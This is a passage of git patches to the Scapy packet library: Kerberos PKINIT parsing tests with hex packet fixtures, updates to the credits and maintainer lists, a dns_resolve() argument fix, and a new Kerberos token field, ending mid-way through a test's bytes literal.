+assert authpack.pkAuthenticator.nonce == 0x5ba497a5 +assert authpack.pkAuthenticator.freshnessToken is None +assert authpack.pkAuthenticator.paChecksum2.checksum.val.hex() == "5aeb03e889e99fcd6c205ef484b9dd7b462b9e94c3fe68b115a71cd287fcd775" +assert authpack.pkAuthenticator.paChecksum2.algorithmIdentifier.algorithm.oidname == "sha256" + += PKINIT - Parse AS-REP with CMS structures (MIT Kerberos) + +from scapy.layers.tls.cert import Cert + +pkt = Kerberos(bytes.fromhex('6b82109730821093a003020105a10302010ba2820987308209833082097fa103020111a282097604820972a082096e3082096a808209663082096206092a864886f70d010702a08209533082094f020103310f300d060960864801650304020105003082012b06072b060105020302a082011e0482011a30820116a082010a03820106000282010100ffb1e474ea4bb6c9248cec29ddf54feac8bf6a3261fd25dfc32e258e0056fb2caf4fb76f90961d706b98c0b16fedadf049aa2c3dda6e5eb42933828b932b8dd10f2e00caa1eb2901df080805fbe8d00cae67e9e35e9c197c362416d09fbfa5ef10e556b7993c7501566156dd431e5ae35eb9d00b86ec529b1af887b7671de382ddf4ec2ce87d71fe1ab3fa6d0338bb9c9d2794feba33356b149bc3d1745f4f2feca0ae97f62aaf3314fa1464c844fc016dd82e3008e2cd3cc762d0cc264981497342820f8c8f4aef29147346aea727cc24c3e64f474a5a2448325123d8d217fb65eaabbb7aab36db0e905e5df46de3686bc94581580924f0226385d2db6c599ca10602044e744899a08206303082062c30820514a00302010202131b00000003b9cb9e577efbe605000000000003300d06092a864886f70d01010b0500304731153013060a0992268993f22c64011916054c4f43414c31163014060a0992268993f22c6401191606444f4d41494e311630140603550403130d444f4d41494e2d4443312d4341301e170d3235303932303232313232395a170d3236303932303232313232395a301b31193017060355040313104443312e444f4d41494e2e4c4f43414c30820122300d06092a864886f70d01010105000382010f003082010a0282010100e6832a3e3ca595057e9f70733d34ea5153e4769dc95eb98d56d7b28e8c0390cdd7bfecf01b5f12931afe8d0a1c2e69b83466b3f8ef88c4b31f2c0a49bcee9fb7b78a7e71c6c69c260e606b96d9d2ba534430c6b5cd3be7ef98110e92a0175b66b0b501d32a39dc17f30033fd0c8fa508e5c781c2d130bc8dfd7cb3a8982bd65c16a15f175e7205337dd17b6f4358644db4e6ad3a0f83a2c605275ef0cf4ca2cf974386283d141f4fb0b1f6d72720b83e4155bd0ac39f6ca7723ca317ae6340f746b4c82195addce715e31928ee0e67cb357d3200ee0b26ee422008c8c3de5c1a5acae88e10c89edff4ccd8543f6eaa551c15ed5d8e756567e39c5d56edb948fd0203010001a382033b30820337302f06092b060104018237140204221e200044006f006d00610069006e0043006f006e00740072006f006c006c00650072301d0603551d250416301406082b0601050507030206082b06010505070301300e0603551d0f0101ff0404030205a0307806092a864886f70d01090f046b3069300e06082a864886f70d030202020080300e06082a864886f70d030402020080300b060960864801650304012a300b060960864801650304012d300b0609608648016503040102300b0609608648016503040105300706052b0e030207300a06082a864886f70d0307301d0603551d0e041604148994b7358e085091a011cd226c9305cdcb6b82a2301f0603551d23041830168014ab14d5ae948281f079726970b3b8f97003aa760c3081c80603551d1f0481c03081bd3081baa081b7a081b48681b16c6461703a2f2f2f434e3d444f4d41494e2d4443312d43412c434e3d4443312c434e3d4344502c434e3d5075626c69632532304b657925323053657276696365732c434e3d53657276696365732c434e3d436f6e66696775726174696f6e2c44433d444f4d41494e2c44433d4c4f43414c3f63657274696669636174655265766f636174696f6e4c6973743f626173653f6f626a656374436c6173733d63524c446973747269627574696f6e506f696e743081c006082b060105050701010481b33081b03081ad06082b060105050730028681a06c6461703a2f2f2f434e3d444f4d41494e2d4443312d43412c434e3d4149412c434e3d5075626c69632532304b657925323053657276696365732c434e3d53657276696365732c434e3d436f6e66696775726174696f6e2c44433d444f4d41494e2c44433d4c4f43414c3f634143657274696669636174653f626173653f6f626a656374436c6173733d63657274696669636174696f6e417574686f72697479303c0603551d1104353033a01f06092b0601040182371901a01204101d9d5575a78e1740b7be50767138da8c82104443312e444f4d41494e2e4c4f43414c304f06092b060104018237190204423040a03e060a2b060104018237190201a030042e532d312d352d32312d313332323235373836362d343033353133333636322d313134303736393232322d31303030300d06092a864886f70d01010b05000382010100205571d8ddc2bbb8cfd56b0fbb8d8b6e38ce376c76135f51f25c3f3a98094d59fee193d678b1ff310effa092985394e84ff033094c1889309e29146d239178e2171e192a7c3ae0ce6c653790f9bef3f3281a238c264c5a944e13fa3e97b7ee21e0c22a74b8ab81f4d0d7dc9a592f55efad413ab5041b123f622537e13733eeda845541e5ff8c9973dc5b482701d579f53c67a5ac3fed6c37b1501154d17661f70a252211e9e320269ab7e468bf3d1f1d65f106818122d05d4e2d4db03f1670f66fd9e711970886c7dae937184256023782771d579795d1c331ecd737d0e9d7bb1b4ca24606302bc9c7c10d8aebcfc8a4a2d6beb3fbd3abf14c2680f665f04e35318201d4308201d0020101305e304731153013060a0992268993f22c64011916054c4f43414c31163014060a0992268993f22c6401191606444f4d41494e311630140603550403130d444f4d41494e2d4443312d434102131b00000003b9cb9e577efbe605000000000003300d06096086480165030402010500a049301606092a864886f70d010903310906072b060105020302302f06092a864886f70d010904312204200916c67ea99156a2738927fc51c6ebee43cdb65d715406d1fb6d40daf49c65ca300d06092a864886f70d0101010500048201007fa8498cf70e6f0f9763eaba1f050dda9ca79d343e93312319a457f157586ea849584da69ae8a3ffe26171a9a8cbd3a4b39fb7c8959ebadf42a69c4c626abcd59aac719042b2b9c90ea81bb7593618641d2b498cd6bd65322ed3dcde8895a68b0889c804ce8526cfee27d664a3cd0cc9f1a74531d029cafe4de15bb14bb4d36659fe276f126cccf421c91db7d5be02fb8185cd0de03bee08f424fc48cb4c3f4294f3225752c09abc33ca358b43b5cf3b7df109e37051f757e08a3caaad1d77d9f310a9bd8ea263a00431b57bf4b37c3b0f998a47209a406531c8fa3ff0fd4aec04e3574b2485bc6ac01d077064b67846a71600b65ff6d417441e034c7bd080eca30e1b0c444f4d41494e2e4c4f43414ca41a3018a003020101a111300f1b0d41646d696e6973747261746f72a58205806182057c30820578a003020105a10e1b0c444f4d41494e2e4c4f43414ca221301fa003020102a11830161b066b72627467741b0c646f6d61696e2e6c6f63616ca382053c30820538a003020112a103020102a282052a04820526690c97f510509c672dac4e1436da9aeb5ac4fde72b75b5c1fcfab03aef11139b30b9d32b62f9c4de8e97bc5148563c5bc5fb031e1b1869c69c2991778190d7f27eeeac2ba5e59b54b1b10af66e526fced04f1dd7edd81da93984962183a50e39f82d6f90c9cc9441fec556432ec776a4b595c459cdcfe45489d360f6c950185af170a24897a4eb1127f9c85772fe0417733b254604cd704a15993b77ac18fb1fd8fddb9e888f8c05ffd4c7a5e519593c9e7588c92345ca6ca2e04f0c83231bcc90adccb189e98c2afd53bdb8e665f91d5c3aafde51c60e9b42e88de76261060090483a8dc2d129b66cc3890524004295b5ba440c0a00b352ce91616df2c9a0153e5fd072a9a356dba5e44d79c032afc4d985a180d8fb1f9bba46be602a73ba7c4098683d6ffac4e456b0e51e9473f8ff40e50b437d370b087e1d41089d9f382a17e212d13244f95ad1fb629769c5d53b2ade80c6690fa845efb590a2c6e81851ea9ca1ba319c3a8f86bc62bbcbabf3ecc39d3f6988157a4c390ada2f42b7c577438bcfdb4136bbff92c3c32eb22213e14c51de330f4df4d493bcaa322a3eea01fe504bd03c18786ed385ca205af4396eb6c7b1cfa0e13bcf3e00452461b5c1f9761ef5edb35cfa79fdea04a5420b9762d6f2cf74d694b35c812ba62620c4e6e90ee6483768e38fa0011706d2c093a22202707c5c90cf3ea4c4f17c017f9d7e85a7cc555bf9c9bd4c1337282b5de0395d123ca25c2a9c9eca5cdc31dfd54db75f43eadadd7c7e3a3611a6c1a806c7ff5b0d0b102155978c745a9b4a022018009641ad9197492de70dee4248d159a2b2c5d6adbf253ac04dbe5713cf2878ef440aa68989b2655687a7b35f6a547a8c5a076004c58baa1b231bec7501f5f5bb9f1c66c8cc22d35641cd4442244f349d0351263bb2f1e11b4f4ec26044c87f93a1a963649f5be7a8d61306fe47a10427ac14ba6b9b09ec69950e5176e933cc1fdce258c62ccae4011e8eccab0a36b9ac1d21d36df38c32d65f438d25defa0eb5c577f5f2458304679a9934796be00d3335b7fee1f7616768f0547bd949b764ed2b4684951b35b57a7168fe79d8cd7580dfecddbc30afb8d47032f12cc5b2ee1c16a731dd977f2476989f465fdf6e08992ba566264d1e0a8f0f7274533293e2aa1c418397dc89f9f48d5d9dc3cd82548327be0ebc9b3edeb00f6cf0df8b339d10daae5bb02e9572881fbc5246d5db408fd9cf16209a4ef6b2fc6765d9d9092054b362494be360847b12927ea2fd73b89d345c22fe662f2096952edb69983f147eee5635f40c0bd7bca09b61f644a9df3ecccd0fd0d9c245b4fb224e415bfd58637d341214bc8b2e962df1e7845da642ee4b7a5343c8cee746f6da89cbe3c89f278c6d42f9a743d97ad2c767f1514458db99ca5f29175609e3a7a704b21de8c3cee0646eb60dfb5ddf6824008232dcbdf81b76b941c8af5c0788384bf61f694d80a00b9dc28ae8b0ff782d0b7fcefd60114518401534974c59b88ca89bb4f4a2a5e6e71d7f08342f830338981f534a1affc8ad28b9ec8c54b64321aaafb1d7f049719fda712def001492d6d404bf1da6043687f82378857453b0539a6cd7f452f4b789944a0ca6f238fd321687ac0685a81c9e77f113b7f5c1de3fba74b88f4e0c6cec90e230f16099f9fdb74c57879a98e4a1a85ad672021afc9199fba18c82a7e57c5655ee8d9e8e9cb6d31bc3920d7dbfe667c315b971f99ce2a3579cd1de9d7bd096dc443a1c0dc92e5f7e83657cf38020495585427720ecac4519162cced74d48c294fdb11086e97585d1a9bfaef4af44691f34341fb5e1f42113f82b597bc3e5f5e877116df8a682014a30820146a003020112a282013d048201396d08189c79793463088601b1497f77742a2980900f4c872aa340d07b36c4ff9f9b97740c6f18a15b2277c9c27f1ae7bad8a5899952ca36d3c2d0aa1e6c3137be54a8db29da9d4af03d72f7b9aea0b9f0a099a2421368e875b3cf6fc85454502e74635dd4683b061914c713cb2c551d8a46fdc47bd784c1d2925374cd0f48d4f917ca073563fe570f55f72d64f2de1776bc38e3aa79f0571ad7c64247d80d83fa3bef9f53dc3454634b78a5f207f01160fdd8a8ff4dbdfe2a2d46ccbf84eaf45299b9379b99a1eec016c143d3dc08dc3d9599e5aa62cdf5dc016fab8deba39d81c4d6c5eea684532bb6697ab61ab88d8ac43c5e36bcadd380b31d19dd8475ee68369ff5d8db5cf7733aafe82d96cc2ab68112216d37c44ddb37b336483d75f0566a713cd508a0c66ab7f13d70541e79e8d2038b42a415416d7d')) +assert isinstance(pkt.root.padata[0].padataValue, PA_PK_AS_REP) + +pk_preauth_resp = pkt.root.padata[0].padataValue +assert isinstance(pk_preauth_resp.rep, DHRepInfo) + +dhrep = pk_preauth_resp.rep +assert dhrep.kdf is None +assert dhrep.serverDHNonce is None + +dhkeyinfo = dhrep.dhSignedData.content.encapContentInfo.eContent +assert dhkeyinfo.subjectPublicKey.y.val == 32278489782659599666680674691617740192025480882925125716566496945858046289374524666228146919540757354337943084659625408278197912527087491522001624804516413386428300641892927787473470630419131055568103619174060490124485923206334065346522123445748745649691028061114330596909397680493778434408463632147264526545631660227144914565541288496092534758943967886391259750733078319727386349536272439561387290863606045665780539098807180454586714490639623651326318384483940150461818440884045020628878002871357420738487965588236164888287449564150835059541717449563619851058161535035543798732468578054040817729345202791857657764252 +assert dhkeyinfo.nonce == 0x4e744899 + +certificates = dhrep.dhSignedData.content.certificates +assert len(certificates) == 1 +cert = Cert(certificates[0].certificate) +assert cert.issuer_str == '/CN=DOMAIN-DC1-CA/dc=DOMAIN' +assert cert.subject_str == '/CN=DC1.DOMAIN.LOCAL' + + Advanced Kerberos tests = Test Kerberos InnerToken wrapping (ancient RFC1964) From d9ab3d6b4e3e787398e372bfbddaee6db5af2f4c Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Mon, 22 Sep 2025 12:09:34 +0200 Subject: [PATCH 1549/1632] General update to the credits (#4841) --- doc/scapy/backmatter.rst | 17 ++++++++++++----- doc/scapy/conf.py | 8 ++++---- pyproject.toml | 5 +++-- 3 files changed, 19 insertions(+), 11 deletions(-) diff --git a/doc/scapy/backmatter.rst b/doc/scapy/backmatter.rst index 5c8df340f32..137cc0358bc 100644 --- a/doc/scapy/backmatter.rst +++ b/doc/scapy/backmatter.rst @@ -1,11 +1,18 @@ -********* +******* Credits -********* +******* -- Philippe Biondi is Scapy's author. He has also written most of the documentation. -- Pierre Lalet, Gabriel Potter, Guillaume Valadon, Nils Weiss are the current most active maintainers and contributors. +The maintainers of Scapy are: + - Gabriel Potter (Lead maintainer) + - Nils Weiss + - Guillaume Valadon + - Pierre Lalet + +Former maintainers include: + - Philippe Biondi, who was Scapy's original author. + +Other documentation credits include: - Fred Raynal wrote the chapter on building and dissecting packets. - Peter Kacherginsky contributed several tutorial sections, one-liners and recipes. - Dirk Loss integrated and restructured the existing docs to make this book. -- Nils Weiss contributed automotive specific layers and utilities. diff --git a/doc/scapy/conf.py b/doc/scapy/conf.py index 8776319cac8..be9480fb2f0 100644 --- a/doc/scapy/conf.py +++ b/doc/scapy/conf.py @@ -68,7 +68,7 @@ # General information about the project. project = 'Scapy' year = datetime.datetime.now().year -copyright = '2008-%s Philippe Biondi and the Scapy community' % year +copyright = '2008-%s The Scapy community' % year # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the @@ -168,7 +168,7 @@ # author, documentclass [howto, manual, or own class]). latex_documents = [ ('index', 'Scapy.tex', 'Scapy Documentation', - 'Philippe Biondi and the Scapy community', 'manual'), + 'The Scapy community', 'manual'), ] @@ -178,7 +178,7 @@ # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'scapy', 'Scapy Documentation', - ['Philippe Biondi and the Scapy community'], 1) + ['The Scapy community'], 1) ] @@ -189,7 +189,7 @@ # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'Scapy', 'Scapy Documentation', - 'Philippe Biondi and the Scapy community', 'Scapy', + 'The Scapy community', 'Scapy', '', 'Miscellaneous'), ] diff --git a/pyproject.toml b/pyproject.toml index 501096e4ac4..3e89fcf7dc0 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -7,12 +7,13 @@ name = "scapy" dynamic = [ "version", "readme" ] authors = [ { name="Philippe BIONDI" }, + { name="Gabriel POTTER" }, ] maintainers = [ - { name="Pierre LALET" }, { name="Gabriel POTTER" }, - { name="Guillaume VALADON" }, { name="Nils WEISS" }, + { name="Guillaume VALADON" }, + { name="Pierre LALET" }, ] license = { text="GPL-2.0-only" } requires-python = ">=3.7, <4" From 4317859ce0ada5a779c589b77d9547d384064185 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Mon, 22 Sep 2025 15:14:14 +0200 Subject: [PATCH 1550/1632] Other minor changes to credits (#4842) --- doc/scapy/backmatter.rst | 4 ++-- pyproject.toml | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/doc/scapy/backmatter.rst b/doc/scapy/backmatter.rst index 137cc0358bc..56f1c2ed175 100644 --- a/doc/scapy/backmatter.rst +++ b/doc/scapy/backmatter.rst @@ -4,10 +4,10 @@ Credits ******* The maintainers of Scapy are: + - Pierre Lalet - Gabriel Potter (Lead maintainer) - - Nils Weiss - Guillaume Valadon - - Pierre Lalet + - Nils Weiss Former maintainers include: - Philippe Biondi, who was Scapy's original author. diff --git a/pyproject.toml b/pyproject.toml index 3e89fcf7dc0..109963e5cad 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -10,10 +10,10 @@ authors = [ { name="Gabriel POTTER" }, ] maintainers = [ + { name="Pierre LALET" }, { name="Gabriel POTTER" }, - { name="Nils WEISS" }, { name="Guillaume VALADON" }, - { name="Pierre LALET" }, + { name="Nils WEISS" }, ] license = { text="GPL-2.0-only" } requires-python = ">=3.7, <4" From 90c5ff4e514627594644b5aac0d58c38b0c90f20 Mon Sep 17 00:00:00 2001 From: Xavier Mehrenberger Date: Fri, 3 Oct 2025 11:26:03 +0200 Subject: [PATCH 1551/1632] Remove duplicate arguments in call to dns_resolve() (#4847) Co-authored-by: Xavier Mehrenberger --- scapy/layers/dns.py | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 864ead516ad..2c6dcc7af67 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -1418,7 +1418,7 @@ def dns_resolve(qname, qtype="A", raw=False, tcp=False, verbose=1, timeout=3, ** return result kwargs.setdefault("timeout", timeout) - kwargs.setdefault("verbose", 0) + kwargs.setdefault("verbose", verbose) res = None for nameserver in conf.nameservers: # Try all nameservers @@ -1455,8 +1455,6 @@ def dns_resolve(qname, qtype="A", raw=False, tcp=False, verbose=1, timeout=3, ** qtype=qtype, raw=raw, tcp=True, - verbose=verbose, - timeout=timeout, **kwargs, ) elif verbose: From 6ed82a2348063cb9409994796c14828a85a22fd6 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Fri, 3 Oct 2025 22:09:08 +0200 Subject: [PATCH 1552/1632] Fix Kerberos parsing after KB5068222 (#4850) * Fix Kerberos parsing after KB5068222 * Add noqa comment for line length in kerberos.py --- scapy/layers/kerberos.py | 12 ++++++++---- test/scapy/layers/kerberos.uts | 5 ++--- 2 files changed, 10 insertions(+), 7 deletions(-) diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 05b65057581..c8a3320d6e7 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -102,6 +102,7 @@ LEShortEnumField, LEShortField, LongField, + MayEnd, MultipleTypeField, PacketField, PacketLenField, @@ -113,12 +114,12 @@ StrFieldUtf16, StrFixedLenEnumField, XByteField, - XLEIntField, XLEIntEnumField, + XLEIntField, XLEShortField, + XStrField, XStrFixedLenField, XStrLenField, - XStrField, ) from scapy.packet import Packet, bind_bottom_up, bind_top_down, bind_layers from scapy.supersocket import StreamSocket, SuperSocket @@ -905,7 +906,9 @@ class LSAP_TOKEN_INFO_INTEGRITY(Packet): 0x00005000: "Protected process", }, ), - XStrFixedLenField("MachineID", b"", length=32), + MayEnd(XStrFixedLenField("MachineID", b"", length=32)), + # KB 5068222 - still waiting for [MS-KILE] update (oct. 2025) + XStrFixedLenField("PermanentMachineID", b"", length=32), ] @@ -4891,7 +4894,8 @@ def GSS_Init_sec_context( adType="KERB-AUTH-DATA-TOKEN-RESTRICTIONS", adData=KERB_AD_RESTRICTION_ENTRY( restriction=LSAP_TOKEN_INFO_INTEGRITY( - MachineID=bytes(RandBin(32)) + MachineID=bytes(RandBin(32)), + PermanentMachineID=bytes(RandBin(32)), # noqa: E501 ) ), ), diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts index 7d95584c9e1..0080964f995 100644 --- a/test/scapy/layers/kerberos.uts +++ b/test/scapy/layers/kerberos.uts @@ -1453,8 +1453,7 @@ assert ap_req.ticket == clicontext.ssp.ST # Hardcode (yes this will probably require updating this test) bytes(tok) -assert bytes(tok) == b'`\x82\x06@\x06\x06+\x06\x01\x05\x05\x02\xa0\x82\x0640\x82\x060\xa0\x180\x16\x06\t*\x86H\x82\xf7\x12\x01\x02\x02\x06\t*\x86H\x86\xf7\x12\x01\x02\x02\xa2\x82\x06\x12\x04\x82\x06\x0e`\x82\x06\n\x06\t*\x86H\x86\xf7\x12\x01\x02\x02\x01\x00n\x82\x05\xf90\x82\x05\xf5\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0e\xa2\x04\x03\x02\x05 \xa3\x82\x04\xa5a\x82\x04\xa10\x82\x04\x9d\xa0\x03\x02\x01\x05\xa1\x0e\x1b\x0cDOMAIN.LOCAL\xa2\x160\x14\xa0\x03\x02\x01\x03\xa1\r0\x0b\x1b\x04cifs\x1b\x03dc1\xa3\x82\x04l0\x82\x04h\xa0\x03\x02\x01\x12\xa1\x03\x02\x01\r\xa2\x82\x04Z\x04\x82\x04Vg\x1fa1\xb3\x8e\xe6\xe6\x82\xd6,\xb97\xb8\xb7\x9cX\x97S\x18/\x8d\xbc\xb1J\x91\xb01\x05*< \xf7\xb4\xc8\x9b\xf9\xa4\x1f\xe9\x96\r\x11*\xccs\xf6\xbde\'\xdf\xe7\x07\x00\xa3\xd3\xc2\xe7+K\xa6p]\xfc\x04\x0f\xd5o\x9d|\xd6\x0bX\x0e\xbe\xce\xc2\xbf\xb2@\xba\xaca\x96\x90\xdb\xd90\x1e\xd9\x8c\xac\x03|\xfd\xff\x8f\xf9j\xc9\x83X\x96\x9f52\xf9\xc6\xad\xc0v\xd16\xa0\xef\x96\xeb\xdd\xef)=\xf8y\xbbB\xad\xfb\xf7g\x044\xf3@\xadg>\x03\x03\xae\x18n\x1aQ\r\x7fP\xdb\xfe\xe9\xeb\xab2\x9dws9\xf5\xcb\x94\xab\xc1\x9e\xbd\x08\x0f\xfcx\x18\x1b\xf8\x1f\xf2\'\x18-\xe4"\x93vuTf3\xbdj\xb6\x88%\x8a\x94\xd12\xfbY\x0f\x81R\xd3\xf1\x9b\xd5Z\x1f3o\xb7\xc3\x82\x14\t\x87\xac#\x89\x13M\x803\x88/\x92==S$\xa3\xe9\xf5C{\xd7\x0f\t^k\xb0\x0e\xe6\x8d\x8f!\x91+\x19\xb2y$\xc6\x1bN;\xfehA\x1f\x9f"\r\xe8\xda\xce\x00\xe7g\xb6b17\x06s\rM\xc8S\x9b0\x9f\xc7^l\xa4\xca\xe4p\xcd\xf1,\xc3\xcf\xb1\x91Hn>^\xb8\xc8\x07#\xb2\xb0G;\x07\xe4\xeaM8T\x87\xdd0=\xf2\xdb\x8d1\xf8\xc9\rS\xc4\xad\xcf9\xadx\xcfl\x85\xfb\xb8{LN\xe51\xa4,!3\xdf+\x03b\x13#t\xdf\x99T \xe4\xb2\xa6\xd1\xe1\x9dxy\xd5\x18e-Q\x01\xa3\x16\x96+\'\xb3\x88L\xb6}\x07W/\x96\xb9f\x8c\xa4,\xcas\x11\xa7\x15*\xc7\xc6\xd4\x92\x00\x91\x92\xfaJpy\x89\xe4;*\x10\xf1\x9eS^|\xf8\xaf\xda\xf6<\xe9\xa2\xa8\\\xe1\xbd\x17\xd8\x1c\xfev\xd2\xceWY\xa7\xfd\xbe\xffo\xb2y\xb8b\x0b\xc2\xc5\x18;$\xbe\x83\x1c~\xe1W\x11O\'\x00\xda!\x0b6\xed\xb7\xbd\xa7\xd9\x1a2\xf7\x94\x0b\xefC\x1cvW\x1c\xd4D\x99\xf7y\xccN\xbe\x82\x9f\xb3N\xea\xa1\xe4B$\rYb\xbd\xbc\xbc\x16\xc9b\x97KTn\x9c\xee8\r\xdaI\xf6Q\xac\xc5\xc5\x8a\xca\xe4\xad\x06\xd5~K\x91\xd8\xc5Use\xe8\xdd\xda~\xe9U\tc\xd7\rOV\xb4O\xc5\xa2n)\xb3l\xb2\x1d\x11"\x18%\xb5\xa2!|\xb1\xf1EM4\xd9J\x85\\\xb8`\xf2\xfeCh\x1e=0.~\x12Bs\xdd\x18\xb0O\xdd\xf6`\xb8\x85\x8e\x1ex\xd0"\xcc\x03\xf4g\xf3\xcf\x1an]\xf5;\xb81yEB\xb1\xd0\x8e8\xd3\xbf\xb0\xbf.[\xa6\xf7Z\x0fw\xd5k\xf2\x92K\x14O\xff<\x87\xeczW\xbf\xf3E\xee\x8aD\x96gm8\xc9E<8\xe6E!\xdb-\xe6\xd6E*\xa8\xf3\xda\x16u\x13N\x8d\x90\xcb\xb0\xd2t\xcea\x89V?\xd9\xa5nV\xa8\x00f\x1ex{\x089Pb05\xdd\xee\xb2\xfb\x84\xf6\xfb%\x07\xf2\xc1W\xe7N\x81\xa8\x19p\xe1\x14u\xce\x92n9:U\xb0kw\xc4D\xdb\xd26\x88\xe8\xa7|\x7f03xt\xfe\xf7\x87\xa1\x87\xfc\xaf\xd7:ZH7\xc8\xe3\xe6\x07\x120\x85\x97\xffr\xea.\xda\xe6\x9c\x94\x02\xadz\xe8\x1a\xbb>\x91\x00\xf0\xc8{\x99\xb2VBF\xbdV\xaf\x8em\x0e\xcf)(\xe5\x15\x12\x18\xf7\xe6\'\xc5e\xe1U@foO|\x0e\x93|-\x0e\x84x/\xcb\x1bS^YolN\n\xed|\x1d5\x0e\x16\x9d\x04_.\xaa\xa4\xbb/\x94\xcd\x14\x95v\xf85\xe5\xee\xcbD\x18g}\x04D\xe5\x1f\xaf\xcb\xed*\xfa\xc5\x0b\x1d2\x0b\xc2#\xd2b6\x01\xae\xe6\xdfj6:$)K\xfb;\x00\xf2f\x8d\xfc@N\x9f\xa1\x7f\xe96\xe6b\x07V\xa6\x91\x8f}\xe2\xde4?8\x0f\xab\x83\xfd\xe9\x11\x12K\xe5\x08\xa4\x82\x0180\x82\x014\xa0\x03\x02\x01\x12\xa2\x82\x01+\x04\x82\x01\'\\>\t\xe4\x1d8,a(\x7f\x1e\xd2\x8dHH\x9c\xef\x8d\x1fqW\xbf(\x97S+\rs_zM\xee\xa7\xc2\x1a\x8eh1\xa4\xcb\x06\xed\x8e\xe6\xc0\x9a\xf7\x93g5\xa5vp\x0e~G\xaf:\xbb<\xaa2\x0e\xf8+l \xc5\xdb\x17,\xa9\x99\xae\x80\r\x0f\xdd4\x92\xf1\xa3h\xc3)^*I\x92\x01\x9f\x06jW\x1a\xac=\xa4\xee\xfdo.\xc8\xd5\x9e\xeaNw\x9eu\xc3\x8b0\xc9_S\x1f\x19u\xbap\x1d\\\x88\x0eu\xbek\xa8}\n\xa0>\x85\xcc3\xed\x84\xadi\x0bB\x9ao\xd2lW\x7f+\x16\x1cxU\x99\x90\x92\xfd\x06\x11ij\xdc\xb5\xc6F\xc0P\xf6\\\xbe\x04I\x9aP\x11\xa5\xff=\xd7\x95\'\xaa\x0e\x1c\xbf\xc4O\xf4D\xc8\xb1Fv\x8f\xff\xde*\'\x17\xe1\xcf\x06\xeb\xd7s\xfc\xa4\x0c6\x87\x9f\xa7\x9b\xe6\xddmMb\xc3\xc8\xcfH\x1a\x1a`\x08\t\x83\x01\x01\x81R\x8d\xda\xd7\xebZ\x83\x8eO\x14\x8e\xf7\x1fc\xb0KcC\xba\xf3\x04+L\xe3\xc1\xf5\xadF\xda\xfa\xe6q\xe0\x90&\x93\xffd\x16\x03\x03\xae\x18n\x1aQ\r\x7fP\xdb\xfe\xe9\xeb\xab2\x9dws9\xf5\xcb\x94\xab\xc1\x9e\xbd\x08\x0f\xfcx\x18\x1b\xf8\x1f\xf2\'\x18-\xe4"\x93vuTf3\xbdj\xb6\x88%\x8a\x94\xd12\xfbY\x0f\x81R\xd3\xf1\x9b\xd5Z\x1f3o\xb7\xc3\x82\x14\t\x87\xac#\x89\x13M\x803\x88/\x92==S$\xa3\xe9\xf5C{\xd7\x0f\t^k\xb0\x0e\xe6\x8d\x8f!\x91+\x19\xb2y$\xc6\x1bN;\xfehA\x1f\x9f"\r\xe8\xda\xce\x00\xe7g\xb6b17\x06s\rM\xc8S\x9b0\x9f\xc7^l\xa4\xca\xe4p\xcd\xf1,\xc3\xcf\xb1\x91Hn>^\xb8\xc8\x07#\xb2\xb0G;\x07\xe4\xeaM8T\x87\xdd0=\xf2\xdb\x8d1\xf8\xc9\rS\xc4\xad\xcf9\xadx\xcfl\x85\xfb\xb8{LN\xe51\xa4,!3\xdf+\x03b\x13#t\xdf\x99T \xe4\xb2\xa6\xd1\xe1\x9dxy\xd5\x18e-Q\x01\xa3\x16\x96+\'\xb3\x88L\xb6}\x07W/\x96\xb9f\x8c\xa4,\xcas\x11\xa7\x15*\xc7\xc6\xd4\x92\x00\x91\x92\xfaJpy\x89\xe4;*\x10\xf1\x9eS^|\xf8\xaf\xda\xf6<\xe9\xa2\xa8\\\xe1\xbd\x17\xd8\x1c\xfev\xd2\xceWY\xa7\xfd\xbe\xffo\xb2y\xb8b\x0b\xc2\xc5\x18;$\xbe\x83\x1c~\xe1W\x11O\'\x00\xda!\x0b6\xed\xb7\xbd\xa7\xd9\x1a2\xf7\x94\x0b\xefC\x1cvW\x1c\xd4D\x99\xf7y\xccN\xbe\x82\x9f\xb3N\xea\xa1\xe4B$\rYb\xbd\xbc\xbc\x16\xc9b\x97KTn\x9c\xee8\r\xdaI\xf6Q\xac\xc5\xc5\x8a\xca\xe4\xad\x06\xd5~K\x91\xd8\xc5Use\xe8\xdd\xda~\xe9U\tc\xd7\rOV\xb4O\xc5\xa2n)\xb3l\xb2\x1d\x11"\x18%\xb5\xa2!|\xb1\xf1EM4\xd9J\x85\\\xb8`\xf2\xfeCh\x1e=0.~\x12Bs\xdd\x18\xb0O\xdd\xf6`\xb8\x85\x8e\x1ex\xd0"\xcc\x03\xf4g\xf3\xcf\x1an]\xf5;\xb81yEB\xb1\xd0\x8e8\xd3\xbf\xb0\xbf.[\xa6\xf7Z\x0fw\xd5k\xf2\x92K\x14O\xff<\x87\xeczW\xbf\xf3E\xee\x8aD\x96gm8\xc9E<8\xe6E!\xdb-\xe6\xd6E*\xa8\xf3\xda\x16u\x13N\x8d\x90\xcb\xb0\xd2t\xcea\x89V?\xd9\xa5nV\xa8\x00f\x1ex{\x089Pb05\xdd\xee\xb2\xfb\x84\xf6\xfb%\x07\xf2\xc1W\xe7N\x81\xa8\x19p\xe1\x14u\xce\x92n9:U\xb0kw\xc4D\xdb\xd26\x88\xe8\xa7|\x7f03xt\xfe\xf7\x87\xa1\x87\xfc\xaf\xd7:ZH7\xc8\xe3\xe6\x07\x120\x85\x97\xffr\xea.\xda\xe6\x9c\x94\x02\xadz\xe8\x1a\xbb>\x91\x00\xf0\xc8{\x99\xb2VBF\xbdV\xaf\x8em\x0e\xcf)(\xe5\x15\x12\x18\xf7\xe6\